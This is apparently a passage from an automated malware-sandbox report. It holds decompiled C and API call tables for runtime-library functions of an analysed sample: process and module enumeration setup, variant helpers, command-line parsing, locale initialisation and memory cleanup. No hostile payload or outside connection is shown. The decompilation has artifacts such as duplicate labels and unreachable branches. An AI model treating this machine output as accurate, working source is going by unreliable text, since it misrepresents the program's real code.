						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040DBC0, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E0040D7EC(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040C5A0();
					return E0040D7EC(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040C9F4();
						_t113 = _t54;
						if(_t113 == 0) {
							E0040D544(_t100);
						}
						E0040DB18(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E0040DB34(_v788 - 1, _t115) != 0) {
								L0040CA0C();
								E0040D7EC(_v792);
								L0040CA0C();
								E0040D7EC( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E0040DB64(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040C9FC();
							E0040D7EC(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040CA04();
							E0040D7EC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t112 = _t112 + 1;
							_t114 = _t114 + 8;
							_t99 = _t99 - 1;
						} while (_t99 != 0);
						goto L9;
					}
				}
			}





























    0x0040dbc0
    0x0040dbcc
    0x0040dbd2
    0x0040dbd4
    0x0040dbde
    0x0040dbe5
    0x0040dbe5
    0x0040dbea
    0x0040dbf8
    0x0040dd71
    0x0040dd78
    0x0040dd79
    0x00000000
    0x0040dbfe
    0x0040dc01
    0x0040dc13
    0x0040dc03
    0x0040dc08
    0x0040dc08
    0x0040dc22
    0x0040dc2e
    0x0040dc31
    0x0040dc9e
    0x0040dca4
    0x0040dca5
    0x0040dcab
    0x0040dcac
    0x0040dcae
    0x0040dcb3
    0x0040dcb7
    0x0040dcb9
    0x0040dcb9
    0x0040dcc4
    0x0040dccf
    0x0040dcda
    0x0040dce3
    0x0040dce6
    0x0040dd02
    0x0040dd09
    0x0040dd14
    0x0040dd2b
    0x0040dd30
    0x0040dd44
    0x0040dd49
    0x0040dd5c
    0x0040dd5c
    0x0040dd65
    0x0040dce8
    0x0040dce8
    0x0040dce9
    0x0040dcef
    0x0040dcf5
    0x0040dcf7
    0x0040dcf9
    0x0040dcfc
    0x0040dcff
    0x0040dcff
    0x0040dd02
    0x00000000
    0x00000000
    0x00000000
    0x0040dd02
    0x0040dc33
    0x0040dc33
    0x0040dc34
    0x0040dc36
    0x0040dc3c
    0x0040dc3e
    0x0040dc4d
    0x0040dc4e
    0x0040dc58
    0x0040dc59
    0x0040dc5e
    0x0040dc69
    0x0040dc6a
    0x0040dc74
    0x0040dc75
    0x0040dc7a
    0x0040dc95
    0x0040dc97
    0x0040dc98
    0x0040dc9b
    0x0040dc9b
    0x00000000
    0x0040dc3c
    0x0040dc31

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
